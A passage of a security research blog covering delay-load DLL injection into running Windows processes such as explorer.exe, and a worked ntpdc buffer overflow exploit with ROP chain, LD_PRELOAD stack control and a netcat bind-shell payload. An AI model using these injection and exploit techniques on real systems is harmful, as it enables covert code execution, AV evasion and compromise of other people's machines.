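For illustration, a minimal sketch of registering one of these hooks via the mechanism in delayimp.h:

#include <windows.h>
#include <delayimp.h>
#include <stdio.h>

// called by __delayLoadHelper2 at each notification state
FARPROC WINAPI myDelayHook(unsigned dliNotify, PDelayLoadInfo pdli)
{
    if (dliNotify == dliNotePreLoadLibrary)
        printf("about to delay load: %s\n", pdli->szDll);
    return NULL; // NULL lets the helper carry on normally
}

// on newer toolchains the hook pointer is const and must be defined like
// this, rather than assigned at runtime
const PfnDliHook __pfnDliNotifyHook2 = myDelayHook;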

Finally, in addition to delay loading, the portable executable also supports delay library unloading. It works pretty much how you’d expect it, so we won’t be touching on it here.

Limitations

Before detailing how we might abuse this (though it should be fairly obvious), it’s important to note the limitations of this technique. It is not completely portable, and using pure delay load functionality it cannot be made to be so.

The glaring limitation is that the technique requires the remote process to be delay linked. A brief crawl of some local processes on my host shows that many Microsoft applications are: dwm, explorer, cmd. Many non-Microsoft applications are as well, including Chrome. It is additionally a well supported feature of the portable executable format, and exists today on modern systems.

Another limitation is that, because at its core it relies on LoadLibrary, there must exist a DLL on disk. There is no way to LoadLibrary from memory (unless you use one of the countless techniques to do that, but none of which use LoadLibrary…).

In addition to implementing the delay load, the remote process must implement functionality that can be triggered. Instead of doing a CreateRemoteThread, SendNotifyMessage, or ResumeThread, we rely on the fetch to the pseudo IAT, and thus we must be able to trigger the remote process into performing this action/executing this function. This is generally pretty easy if you’re using the suspended process/new process strategy, but may not be trivial on running applications.

Finally, any process that does not allow unsigned libraries to be loaded will block this technique. This is controlled by ProcessSignaturePolicy and can be set with SetProcessMitigationPolicy[2]; it is unclear how many apps are using this at the moment, but Microsoft Edge was one of the first big products to be employing this policy. This technique is also impacted by the ProcessImageLoadPolicy policy, which can be set to restrict loading of images from a UNC share.

Abuse

When discussing an ability to inject code into a process, there are three separate cases an attacker may consider, and some additional edge situations within remote processes. Local process injection is simply the execution of shellcode/arbitrary code within the current process. Suspended process is the act of spawning a new, suspended process from an existing, controlled one and injecting code into it. This is a fairly common strategy to employ for migrating code, setting up backup connections, or establishing a known process state prior to injection. The final case is the running remote process.

The running remote process is an interesting case with several caveats that we’ll explore below. I won’t detail suspended processes, as it’s essentially the same as a running process, but easier. It’s easier because many applications actually just load the delay library at runtime, either because the functionality is environmentally keyed and required then, or because another loaded DLL is linked against it and requires it. Refer to the source code for the project for an implementation of suspended process injection [3].

Local Process

The local process is the simplest case and arguably the most useless for this strategy. If we can inject and execute code in this manner, we might as well link against the library we want to use. It serves as a fine introduction to the topic, though.

The first thing we need to do is delay link the executable against something. For various reasons I originally chose dnsapi.dll. You can specify delay load DLLs via the linker options for Visual Studio.

With that, we need to obtain the RVA for the delay directory. This can be accomplished with the following function:

IMAGE_DELAYLOAD_DESCRIPTOR*
findDelayEntry(char *cDllName)
{
    PIMAGE_DOS_HEADER pImgDos = (PIMAGE_DOS_HEADER)GetModuleHandle(NULL);
    PIMAGE_NT_HEADERS pImgNt = (PIMAGE_NT_HEADERS)((LPBYTE)pImgDos + pImgDos->e_lfanew);
    PIMAGE_DELAYLOAD_DESCRIPTOR pImgDelay = (PIMAGE_DELAYLOAD_DESCRIPTOR)((LPBYTE)pImgDos + 
            pImgNt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT].VirtualAddress);
    DWORD dwBaseAddr = (DWORD)GetModuleHandle(NULL);
    IMAGE_DELAYLOAD_DESCRIPTOR *pImgResult = NULL;

    // iterate over entries 
    for (IMAGE_DELAYLOAD_DESCRIPTOR* entry = pImgDelay; entry->ImportAddressTableRVA != NULL; entry++){
        char *_cDllName = (char*)(dwBaseAddr + entry->DllNameRVA);
        if (strcmp(_cDllName, cDllName) == 0){
            pImgResult = entry;
            break;
        }
    }

    return pImgResult;
}

Should be pretty clear what we’re doing here. Once we’ve got the correct table entry, we need to mark the entry’s DllName as writable, overwrite it with our custom DLL name, and restore the protection mask:

IMAGE_DELAYLOAD_DESCRIPTOR *pImgDelayEntry = findDelayEntry("DNSAPI.dll");
DWORD dwEntryAddr = (DWORD)((DWORD)GetModuleHandle(NULL) + pImgDelayEntry->DllNameRVA);
VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), PAGE_READWRITE, &dwOldProtect);
WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwEntryAddr, (LPVOID)ndll, strlen(ndll), &wroteBytes);
VirtualProtect((LPVOID)dwEntryAddr, sizeof(DWORD), dwOldProtect, &dwOldProtect);

Now all that’s left to do is trigger the targeted function. Once triggered, the delay helper function will snag the DllName from the table entry and load the DLL via LoadLibrary.
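
In the dnsapi.dll example, a minimal trigger sketch is just a call to any delay linked import:

#include <windows.h>
#include <windns.h>

// assumes the binary was linked with /DELAYLOAD:dnsapi.dll, per the
// DnsAcquireContextHandle walkthrough earlier
void trigger(void)
{
    HANDLE hCtx = NULL;
    // the first invocation walks the tailMerge stub and __delayLoadHelper2,
    // which now LoadLibrary's whatever name we patched into the descriptor
    DnsAcquireContextHandle_W(0, NULL, &hCtx);
}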

Remote Process

The most interesting of cases is the running remote process. For demonstration here, we’ll be targeting explorer.exe, as we can almost always rely on it to be running on a workstation under the current user.

With an open handle to the explorer process, we must perform the same searching tasks as we did for the local process, but this time in a remote process. This is a little more cumbersome, but the code can be found in the project repository for reference[3]. We simply grab the remote PEB, parse the image and its directories, and locate the appropriate delay entry we're targeting.

This part is likely to prove the most unfriendly when attempting to port this to another process; what functionality are we targeting? What function or delay load entry is generally unused, but triggerable from the current session? With explorer there are several options; it’s delay linked against 9 different DLLs, each averaging 2-3 imported functions. Thankfully one of the first functions I looked at was pretty straightforward: CM_Request_Eject_PC. This function, exported by CFGMGR32.dll, requests that the system be ejected from the local docking station[4]. We can therefore assume that it’s likely to be available and not fixed on workstations, and potentially unfixed on laptops, should the user never explicitly request the system to be ejected.

When we request for the workstation to be ejected from the docking station, the function sends a PNP request. We use the IShellDispatch object to execute this, which is accessed via Shell, handled by, you guessed it, explorer.

The code for this is pretty simple:

HRESULT hResult = S_FALSE;
IShellDispatch *pIShellDispatch = NULL;

CoInitialize(NULL);

hResult = CoCreateInstance(CLSID_Shell, NULL, CLSCTX_INPROC_SERVER, 
                           IID_IShellDispatch, (void**)&pIShellDispatch);
if (SUCCEEDED(hResult))
{
    pIShellDispatch->EjectPC();
    pIShellDispatch->Release();
}

CoUninitialize();

Our DLL only needs to export CM_Request_Eject_PC for us to not crash the process; we can either pass on the request to the real DLL, or simply ignore it. This leads us to stable and reliable remote code injection.
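
A minimal sketch of such a stand-in DLL (payload and details are mine, not the project's):

#include <windows.h>

// stand-in for cfgmgr32's CM_Request_Eject_PC; returning 0 (CR_SUCCESS)
// simply swallows the eject request
__declspec(dllexport) DWORD WINAPI CM_Request_Eject_PC(void)
{
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH)
        WinExec("calc.exe", SW_SHOW); // placeholder payload
    return TRUE;
}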

Remote Process – All Fixed

One interesting edge case is a remote process that you want to inject into via delay loading, but all imported functions have been resolved in the pseudo IAT. This is a little more complicated, but all hope is not lost.

Remember when I mentioned earlier that a handle to the delay load library is maintained in its descriptor? This is the value that the helper function checks for to determine if it should reload the module or not; if it’s null, it attempts to load it, if it’s not, it uses that handle. We can abuse this check by nulling out the module handle, thereby “tricking” the helper function into once again loading that descriptor’s DLL.

In the discussed case, however, the pseudo IAT is all patched up; no more trampolines into the delay load helper function. Helpfully the pseudo IAT is writable by default, so we can simply patch in the trampoline function ourselves and have it instantiate the descriptor all over again. In short, this worst-case strategy requires three separate WriteProcessMemory calls: one to null out the module handle, one to overwrite the pseudo IAT entry, and one to overwrite the loaded DLL name.
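
Sketched out, under those assumptions (all helper and variable names here are mine, not the project's):

// hedged sketch; wpm() is a hypothetical wrapper around VirtualProtectEx +
// WriteProcessMemory, and remoteBase/entry/tailMergeRVA/evilDll are assumed
// to have been recovered as described above
HMODULE hNull = NULL;
DWORD dwThunk = (DWORD)remoteBase + tailMergeRVA;

// 1: null the cached module handle so the helper reloads the library
wpm(hProc, (LPBYTE)remoteBase + entry.ModuleHandleRVA, &hNull, sizeof(hNull));
// 2: point the pseudo IAT entry back at the delay load trampoline
wpm(hProc, (LPBYTE)remoteBase + entry.ImportAddressTableRVA, &dwThunk, sizeof(dwThunk));
// 3: swap in our DLL name
wpm(hProc, (LPBYTE)remoteBase + entry.DllNameRVA, evilDll, strlen(evilDll) + 1);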

Conclusions

I should mention that I tested this strategy against several next gen AV/HIPS appliances, which will go unnamed here, and none were able to detect the cross process injection strategy. Overall it seems to present an interesting detection challenge; in remote processes, the strategy uses the following chain of calls:

OpenProcess(..);

ReadRemoteProcess(..); // read image
ReadRemoteProcess(..); // read delay table 
ReadRemoteProcess(..); // read delay entry 1...n

VirtualProtectEx(..);
WriteRemoteProcess(..);

That’s it. The trigger functionality would be dynamic among each process, and the loaded library would be loaded via supported and well-known Windows facilities. I checked out a few other core Windows applications, and they all have pretty straightforward trigger strategies.

The referenced project[3] includes both x86 and x64 support, and has been tested across Windows 7, 8.1, and 10. It includes three functions of interest: inject_local, inject_suspended, and inject_explorer. It expects to find the DLL at C:\Windows\Temp\TestDLL.dll, but this can obviously be changed. Note that it isn’t production quality; beware, here be dragons.

Special thanks to Stephen Breen for reviewing this post

References

[0] https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
[1] https://www.microsoft.com/msj/1298/hood/hood1298.aspx
[2] https://msdn.microsoft.com/en-us/library/windows/desktop/hh769088(v=vs.85).aspx
[3] https://github.com/hatRiot/DelayLoadInject
[4] https://msdn.microsoft.com/en-us/library/windows/hardware/ff539811(v=vs.85).aspx

Abusing Token Privileges for EoP

1 September 2017 at 21:00

This is just a placeholder post to link off to Stephen Breen and I’s paper on abusing token privileges. You can read the entire paper here[0]. I also recommend checking out the blogpost he posted on Foxglove here[1].

[0] https://raw.githubusercontent.com/hatRiot/token-priv/master/abusing_token_eop_1.0.txt
[1] https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/

ntpdc local buffer overflow

6 January 2015 at 21:10

Alejandro Hdez (@nitr0usmx) recently tweeted about a trivial buffer overflow in ntpdc, a deprecated NTP query tool still available and packaged with any NTP install. He posted a screenshot of the crash as the result of a large buffer passed into a vulnerable gets call. After digging into it a bit, I decided it'd be a fun exploit to write, and it was. There are a few quirks to it that make it of particular interest, which I've detailed below.

As noted, the bug is the result of a vulnerable gets, which can be crashed with the following:

$ python -c 'print "A"*600' | ntpdc
***Command `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' unknown
Segmentation fault

Loading into gdb on an x86 Debian 7 system:

gdb-peda$ i r eax edx esi
eax            0x41414141   0x41414141
edx            0x41414141   0x41414141
esi            0x41414141   0x41414141
gdb-peda$ x/i $eip
=> 0xb7fa1d76 <el_gets+22>: mov    eax,DWORD PTR [esi+0x14]
gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : ENABLED
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

Notice the checksec results of the binary, now compare this to a snippet of the paxtest output:

Mode: Blackhat
Linux deb7-32 3.2.0-4-486 #1 Debian 3.2.63-2+deb7u2 i686 GNU/Linux

Executable anonymous mapping             : Vulnerable
Executable bss                           : Vulnerable
Executable data                          : Vulnerable
Executable heap                          : Vulnerable
Executable stack                         : Vulnerable
Executable shared library bss            : Vulnerable
Executable shared library data           : Vulnerable

And the result of Debian’s recommended hardening-check:

$ hardening-check /usr/bin/ntpdc 
/usr/bin/ntpdc:
 Position Independent Executable: no, normal executable!
 Stack protected: yes
 Fortify Source functions: yes (some protected functions found)
 Read-only relocations: yes
 Immediate binding: no, not found!

Interestingly enough, I discovered this oddity after I had gained code execution in a place I shouldn’t have. We’re also running with ASLR enabled:

$ cat /proc/sys/kernel/randomize_va_space 
2

I’ll explain why the above is interesting in a moment.

So in our current state, we control three registers and an instruction dereferencing ESI+0x14. If we take a look just a few instructions ahead, we see the following:

gdb-peda$ x/8i $eip
=> 0xb7fa1d76 <el_gets+22>: mov    eax,DWORD PTR [esi+0x14] ; deref ESI+0x14 and move into EAX
   0xb7fa1d79 <el_gets+25>: test   al,0x2                   ; test lower byte against 0x2
   0xb7fa1d7b <el_gets+27>: je     0xb7fa1df8 <el_gets+152> ; jump if ZF == 1
   0xb7fa1d7d <el_gets+29>: mov    ebp,DWORD PTR [esi+0x2c] ; doesnt matter 
   0xb7fa1d80 <el_gets+32>: mov    DWORD PTR [esp+0x4],ebp  ; doesnt matter
   0xb7fa1d84 <el_gets+36>: mov    DWORD PTR [esp],esi      ; doesnt matter
   0xb7fa1d87 <el_gets+39>: call   DWORD PTR [esi+0x318]    ; call a controllable pointer 

I’ve detailed the instructions above, but essentially we’ve got a free CALL. In order to reach this, we need an ESI value that at +0x14 will set ZF == 0 (to bypass the test/je) and at +0x318 will point into controlled data.

Naturally, we should figure out where our payload junk is and go from there.

gdb-peda$ searchmem 0x41414141
Searching for '0x41414141' in: None ranges
Found 751 results, display max 256 items:
 ntpdc : 0x806ab00 ('A' <repeats 200 times>...)
gdb-peda$ maintenance i sections
[snip]
0x806a400->0x806edc8 at 0x00021400: .bss ALLOC
gdb-peda$ vmmap
Start      End        Perm  Name
0x08048000 0x08068000 r-xp  /usr/bin/ntpdc
0x08068000 0x08069000 r--p  /usr/bin/ntpdc
0x08069000 0x0806b000 rw-p  /usr/bin/ntpdc
[snip]

Our payload is copied into BSS, which is beneficial as it will remain unaffected by ASLR, with bonus points because our binary wasn't compiled with PIE. We now need to move back -0x318 and look for a value that will set ZF == 0 with the test al,0x2 instruction. A value at 0x806a9e1 satisfies both the +0x14 and +0x318 requirements:

gdb-peda$ x/wx 0x806a9cd+0x14
0x806a9e1:  0x6c61636f
gdb-peda$ x/wx 0x806a9cd+0x318
0x806ace5:  0x41414141

After figuring out the offset in the payload for ESI, we just need to plug 0x806a9cd in and hopefully we’ll have EIP:

$ python -c 'print "A"*485 + "C"*4 + "A"*79 + "\xcd\xa9\x06\x08" + "C"*600' > crash.info
$ gdb -q /usr/bin/ntpdc
$ r < crash.info

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x6c61636f ('ocal')
EBX: 0xb7fabff4 --> 0x1fe40 
ECX: 0xb7dc13c0 --> 0x0 
EDX: 0x43434343 ('CCCC')
ESI: 0x806a9cd --> 0x0 
EDI: 0x0 
EBP: 0x0 
ESP: 0xbffff3cc --> 0xb7fa1d8d (<el_gets+45>:   cmp    eax,0x1)
EIP: 0x43434343 ('CCCC')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x43434343
[------------------------------------stack-------------------------------------]
0000| 0xbffff3cc --> 0xb7fa1d8d (<el_gets+45>:  cmp    eax,0x1)
0004| 0xbffff3d0 --> 0x806a9cd --> 0x0 
0008| 0xbffff3d4 --> 0x0 
0012| 0xbffff3d8 --> 0x8069108 --> 0xb7d7a4d0 (push   ebx)
0016| 0xbffff3dc --> 0x0 
0020| 0xbffff3e0 --> 0xb7c677f4 --> 0x1cce 
0024| 0xbffff3e4 --> 0x807b6f8 ('A' <repeats 200 times>...)
0028| 0xbffff3e8 --> 0x807d3b0 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x43434343 in ?? ()

Now that we’ve got EIP, it’s a simple matter of stack pivoting to execute a ROP payload. Let’s figure out where that "C"*600 lands in memory and redirect EIP there:

gdb-peda$ searchmem 0x43434343
Searching for '0x43434343' in: None ranges
Found 755 results, display max 256 items:
 ntpdc : 0x806ace5 ("CCCC", 'A' <repeats 79 times>, "ͩ\006\b", 'C' <repeats 113 times>...)
 ntpdc : 0x806ad3c ('C' <repeats 200 times>...)
 [snip]

And we’ll fill it with \xcc to ensure we’re there (theoretically triggering NX):

$ python -c 'print "A"*485 + "\x3c\xad\x06\x08" + "A"*79 + "\xcd\xa9\x06\x08" + "\xcc"*600' > crash.info
$ gdb -q /usr/bin/ntpdc
Reading symbols from /usr/bin/ntpdc...(no debugging symbols found)...done.
gdb-peda$ r < crash.info 
[snip]
Program received signal SIGTRAP, Trace/breakpoint trap.
[----------------------------------registers-----------------------------------]
EAX: 0x6c61636f ('ocal')
EBX: 0xb7fabff4 --> 0x1fe40 
ECX: 0xb7dc13c0 --> 0x0 
EDX: 0xcccccccc 
ESI: 0x806a9cd --> 0x0 
EDI: 0x0 
EBP: 0x0 
ESP: 0xbffff3ec --> 0xb7fa1d8d (<el_gets+45>:   cmp    eax,0x1)
EIP: 0x806ad3d --> 0xcccccccc
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x806ad38:   int    0xa9
   0x806ad3a:   push   es
   0x806ad3b:   or     ah,cl
=> 0x806ad3d:   int3   
   0x806ad3e:   int3   
   0x806ad3f:   int3   
   0x806ad40:   int3   
   0x806ad41:   int3
[------------------------------------stack-------------------------------------]
0000| 0xbffff3ec --> 0xb7fa1d8d (<el_gets+45>:  cmp    eax,0x1)
0004| 0xbffff3f0 --> 0x806a9cd --> 0x0 
0008| 0xbffff3f4 --> 0x0 
0012| 0xbffff3f8 --> 0x8069108 --> 0xb7d7a4d0 (push   ebx)
0016| 0xbffff3fc --> 0x0 
0020| 0xbffff400 --> 0xb7c677f4 --> 0x1cce 
0024| 0xbffff404 --> 0x807b9d0 ('A' <repeats 200 times>...)
0028| 0xbffff408 --> 0x807d688 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGTRAP
0x0806ad3d in ?? ()
gdb-peda$ 

Er, what? It appears to be executing code in BSS! Recall the output of paxtest/checksec/hardening-check from earlier: NX was clearly enabled. This took me a few hours to figure out, but it ultimately came down to Debian not distributing x86 images with PAE, or Physical Address Extension. PAE is a kernel feature that allows 32-bit CPUs to address more physical memory by adding a third level of paging and doubling the size of each entry in the page table and page directory. This third level of paging and increased entry size is required for NX on x86 architectures because NX adds a single 'don't execute' bit to each page table entry. You can read more about PAE here, and the original NX patch here.

This flag can be tested for with a simple grep of /proc/cpuinfo; on a fresh install of Debian 7, a grep for PAE will turn up empty, but on something with support, such as Ubuntu, you’ll get the flag back.

Because I had come this far already, I figured I might as well get the exploit working. At this point it was simple, anyway:

$ python -c 'print "A"*485 + "\x3c\xad\x06\x08" + "A"*79 + "\xcd\xa9\x06\x08" + "\x90"*4 + "\x68\xec\xf7\xff\xbf\x68\x70\xe2\xc8\xb7\x68\x30\xac\xc9\xb7\xc3"' > input.file 
$ gdb -q /usr/bin/ntpdc
Reading symbols from /usr/bin/ntpdc...(no debugging symbols found)...done.
gdb-peda$ r < input.file 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
***Command `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<�AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAͩ����h����hp�ȷh0�ɷ�' unknown
[New process 4396]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
process 4396 is executing new program: /bin/dash
[New process 4397]
process 4397 is executing new program: /bin/nc.traditional

This uses a simple system payload with hard-coded addresses, because at this point it's an old-school, CTF-style exploit. And it works. With this trivial PoC working, I decided to check another box I had, to verify whether this configuration is common across distributions. An Ubuntu VM said otherwise:

$ uname -a
Linux bryan-VirtualBox 3.2.0-74-generic #109-Ubuntu SMP Tue Dec 9 16:47:54 UTC 2014 i686 i686 i386 GNU/Linux
$ ./checksec.sh --file /usr/bin/ntpdc
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   /usr/bin/ntpdc
$ cat /proc/sys/kernel/randomize_va_space
2

Quite a different story. We need to bypass full RELRO (no GOT overwrites), PIE+ASLR, NX, SSP, and ASCII armor. In our current state, things are looking pretty grim. As an aside, it’s important to remember that because this is a local exploit, the attacker is assumed to have limited control over the system. Ergo, an attacker may inspect and modify the system in the same manner a limited user could. This becomes important with a few techniques we’re going to use moving forward.

Our first priority is stack pivoting; we won't be able to ROP to victory without control over the stack. There are a few options for this, but the easiest is likely going to be an ADD ESP, ? gadget. The problem with this is that we need some sort of control over the stack, or the ability to shift ESP somewhere into BSS that we control. Looking at the output of ropgadget, we've got 36 options, almost all of which are of the form ADD ESP, ?.

After looking through the list, I determined that none of the values led to control over the stack; in fact, nothing I injected landed on the stack. I did note, however, the following:

gdb-peda$ x/6i 0x800143e0
   0x800143e0: add    esp,0x256c
   0x800143e6: pop    ebx
   0x800143e7: pop    esi
   0x800143e8: pop    edi
   0x800143e9: pop    ebp
   0x800143ea: ret 
gdb-peda$ x/30s $esp+0x256c
0xbffff3a4:  "-1420310755.557158-104120677"
0xbffff3c1:  "WINDOWID=69206020"
0xbffff3d3:  "GNOME_KEYRING_CONTROL=/tmp/keyring-iBX3uM"
0xbffff3fd:  "GTK_MODULES=canberra-gtk-module:canberra-gtk-module"

These are environmental variables passed into the application and located on the program stack. Using the ROP gadget ADD ESP, 0x256c, followed by a series of register POPs, we could land here. Controlling this is easy with the help of LD_PRELOAD, a neat trick documented by Dan Rosenberg in 2010. By exporting LD_PRELOAD, we can control uninitialized data located on the stack, as follows:

$ export LD_PRELOAD=`python -c 'print "A"*10000'`
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
[..snip..]
gdb-peda$ x/10wx $esp+0x256c
0xbfffedc8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffedd8: 0x41414141  0x41414141  0x41414141  0x41414141
0xbfffede8: 0x41414141  0x41414141
gdb-peda$ 

Using some pattern_create/offset magic, we can find the offset in our LD_PRELOAD string and take control over EIP and the stack:

$ export LD_PRELOAD=`python -c 'print "A"*8490 + "AAAA" + "BBBB"'`
$ python -c "print 'A'*485 + '\xe0\x43\x01\x80' + 'A'*79 + '\x8d\x67\x02\x80' + 'B'*600" > input.file
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x6c61636f ('ocal')
EBX: 0x41414141 ('AAAA')
ECX: 0x13560 
EDX: 0x42424242 ('BBBB')
ESI: 0x41414141 ('AAAA')
EDI: 0x41414141 ('AAAA')
EBP: 0x41414141 ('AAAA')
ESP: 0xbffff3bc ("BBBB")
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xbffff3bc ("BBBB")
0004| 0xbffff3c0 --> 0x4e495700 ('')
0008| 0xbffff3c4 ("DOWID=69206020")
0012| 0xbffff3c8 ("D=69206020")
0016| 0xbffff3cc ("206020")
0020| 0xbffff3d0 --> 0x47003032 ('20')
0024| 0xbffff3d4 ("NOME_KEYRING_CONTROL=/tmp/keyring-iBX3uM")
0028| 0xbffff3d8 ("_KEYRING_CONTROL=/tmp/keyring-iBX3uM")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()

This gives us EIP, control over the stack, and control over a decent number of registers; however, the LD_PRELOAD trick is extremely sensitive to stack shifting, which represents a pretty big problem for exploit portability. For now, I'm going to forget about it; chances are we could brute force the offset, if necessary, or simply invoke the application with env -i.

From here, we need to figure out a ROP payload. The easiest payload I can think of is a simple ret2libc. Unfortunately, ASCII armor null bytes all of them:

gdb-peda$ vmmap

0x00327000 0x004cb000 r-xp /lib/i386-linux-gnu/libc-2.15.so
0x004cb000 0x004cd000 r--p /lib/i386-linux-gnu/libc-2.15.so
0x004cd000 0x004ce000 rw-p /lib/i386-linux-gnu/libc-2.15.so
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x366060 <system>
gdb-peda$ 

One idea I had was to simply construct the address in memory, then call it. Using ROPgadget, I hunted for ADD/SUB instructions that modified any registers we controlled. Eventually, I discovered this gem:

0x800138f2: add edi, esi; ret 0;
0x80022073: call edi

Using the above, we could pop controlled, non-null values into EDI/ESI that, when added, equal 0x366060 <system>. Many values will work, but I chose 0xeeffffff and 0x11366061: the 32-bit add wraps around, since 0xeeffffff + 0x11366061 = 0x100366060, which truncates to exactly 0x00366060:

EAX: 0x6c61636f ('ocal')
EBX: 0x41414141 ('AAAA')
ECX: 0x12f00 
EDX: 0x42424242 ('BBBB')
ESI: 0xeeffffff 
EDI: 0x11366061 
EBP: 0x41414141 ('AAAA')
ESP: 0xbfffefb8 --> 0x800138f2 (add    edi,esi)
EIP: 0x800143ea (ret)
EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x800143e7: pop    esi
   0x800143e8: pop    edi
   0x800143e9: pop    ebp
=> 0x800143ea: ret    
   0x800143eb: nop
   0x800143ec: lea    esi,[esi+eiz*1+0x0]
   0x800143f0: mov    DWORD PTR [esp],ebp
   0x800143f3: call   0x80018d20
[------------------------------------stack-------------------------------------]
0000| 0xbfffefb8 --> 0x800138f2 (add    edi,esi)
0004| 0xbfffefbc --> 0x80022073 --> 0xd7ff 
0008| 0xbfffefc0 ('C' <repeats 200 times>...)
0012| 0xbfffefc4 ('C' <repeats 200 times>...)
0016| 0xbfffefc8 ('C' <repeats 200 times>...)
0020| 0xbfffefcc ('C' <repeats 200 times>...)
0024| 0xbfffefd0 ('C' <repeats 200 times>...)
0028| 0xbfffefd4 ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x800143ea in ?? ()

As shown above, we’ve got our two values in EDI/ESI and are returning to our ADD EDI, ESI gadget. Once this completes, we return to our CALL EDI gadget, which will jump into system:

EDI: 0x366060 (<system>:   sub    esp,0x1c)
EBP: 0x41414141 ('AAAA')
ESP: 0xbfffefc0 --> 0xbffff60d ("/bin/nc -lp 5544 -e /bin/sh")
EIP: 0x80022073 --> 0xd7ff
EFLAGS: 0x217 (CARRY PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0x80022073: call   edi

Recall the format of a ret2libc: [system() address | exit() | shell command]; therefore, we need to stick a bogus exit address (in my case, junk) as well as the address of a command. Also remember, however, that CALL EDI is essentially a macro for PUSH EIP+2 ; JMP EDI. This means that our stack will be tainted with the address @ EIP+2. Thanks to this, we don’t really need to add an exit address, as one will be added for us. There are, unfortunately, no JMP EDI gadgets in the binary, so we’re stuck with a messy exit.

This culminates in:

$ export LD_PRELOAD=`python -c 'print "A"*8472 + "\xff\xff\xff\xee" + "\x61\x60\x36\x11" + "AAAA" + "\xf2\x38\x01\x80" + "\x73\x20\x02\x80" + "\x0d\xf6\xff\xbf" + "C"*1492'`
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
[snip all the LD_PRELOAD crap]
[New process 31184]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
process 31184 is executing new program: /bin/dash
[New process 31185]
process 31185 is executing new program: /bin/nc.traditional

Success! Though this is a very dirty hack, and makes no claim of portability, it works. As noted previously, we can brute force the image base and stack offsets, though we can also execute the binary with an empty environment and no stack tampering with env -i, giving us a much higher chance of hitting our mark.

